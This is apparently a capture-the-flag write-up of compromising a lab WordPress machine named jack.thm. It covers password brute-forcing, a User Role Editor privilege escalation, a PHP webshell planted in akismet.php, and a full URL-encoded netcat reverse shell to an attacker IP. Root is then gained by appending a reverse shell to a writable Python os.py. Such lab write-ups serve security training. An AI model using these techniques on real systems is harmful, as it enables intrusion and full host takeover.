Target IP: 10.10.133.0
Challenge Description:
The challenge mentions to insert the hostname jack.thm to my /etc/hosts file. I made the change to my /etc/hosts as shown above.
Performing a port scan shows there are two TCP ports open on the target machine: SSH and HTTP, as shown above. I am assuming the WordPress application runs on the port 80 on the target machine.
Doing an aggressive port scan against the two open TCP ports returns the result above. The aggressive scan found the WordPress application and the disallowed entry /wp-admin inside the robots.txt. Time to perform a subdomain search now. After performing a subdomain search, it only managed to find the entry www. I made the change again to my /etc/hosts file.
Port 80: HTTP
Browsing to port 80 displays the webpage above. In the image above, there is one post created by the user jack.
According to Wappalyzer, the target machine is running WordPress 5.3.2 version as shown above. Now I have more information about the web application.
Using wpscan and the command wpscan --url http://jack.thm --enumerate u, ap, it managed to find the three usernames of the web application shown above. Maybe I can bruteforce their passwords?
And bingo! I tried to bruteforce the passwords of the three users using rockyou.txt passwords file, but I had no luck even after thirty minutes. Then I switched to the fasttrack.txt and got a hit for the user wendy as shown above. Now I have the credentials wendy:changelater.
I browsed to /wp-login page to login with the new bruteforced credentials.
Now I have access to the WordPress application using the credentials of user wendy as shown above. However this user has low privileges as I am unable to change the theme, view the plugins, etc. I performed scans to detect any vulnerable plugins & themes, but I had no luck. I have hit a brickwall now.
After some online search, I found the web application could be vulnerable to the User Role Editor plugin. I found the interesting article above, maybe I can test it against the target machine?
The article from the previous image mentions to intercept a request using Burpsuite after pressing the Update Profile button inside Your Profile section. Then I have to insert the &ure_other_roles=administrator and follow the redirects.
After doing it, I now have administrator privileges as the user wendy on the WordPress application as shown above. Now I can change the themes to obtain a reverse shell connection. However, I had no luck when I tried to change the theme files with my PHP reverse shell. Time to enumerate harder.
I notice there is akismet plugin installed. I inserted my PHP webshell inside the akismet.php at the beginning of the file, as shown above.
And bingo! Now I can access my PHP webshell. I issued the commands ls;id;whoami and obtained the output above. Time to leverage this to a reverse shell connection. I started a listener on my machine at port 8443.
Now I have a foothold on the target machine with the session as www-data as shown above. Using the PHP webshell, I issued the URL-encoded nc reverse shell rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.14.55.153%208443%20%3E%2Ftmp%2Ff.
After landing a shell on the target machine, I found a user called jack. This user has a file called reminder.txt, as shown above. Can I find the backup files?
I ran the command find / -name "*backup*" 2>/dev/null to find any file names that has backup in it. Doing this lead to the directory /var/backups as shown above. And this directory contains an SSH key.
Does this SSH key belong to the user jack? I made a copy of the SSH key on my machine and changed its permission to 400.
And bingo! Using the SSH key, I managed to connect to the target machine as the user jack. I successfully elevated my privileges from www-data to jack as shown above.
I transferred pspy64 to the target machine and obtained the interesting result above. The Python application checker.py is being executed as the user root.
I browsed to /opt/statuscheck and found two files: checker.py and output.log. The content of checker.py is shown above. I cannot directly modify the Python file as I do not have enough privileges. Maybe I can edit the os module?
Running the command find / -writable -type f 2>/dev/null shows /usr/lib/python2.7/os.py is writable!
I inserted my Python reverse shell script inside the os.py at /usr/lib/python2.7 directory. The payload is inserted at the bottom of the file. And any calls to os are removed. Then I started a listener on my machine at port 8444.
And after waiting for a minute, I received a reverse shell connection on my machine at port 8444. Now I have root access on the target machine :)
The user.txt flag is shown above. This flag is located at the home directory of the user jack.
The root.txt flag is shown above. This flag is obtainable after exploiting the os.py module.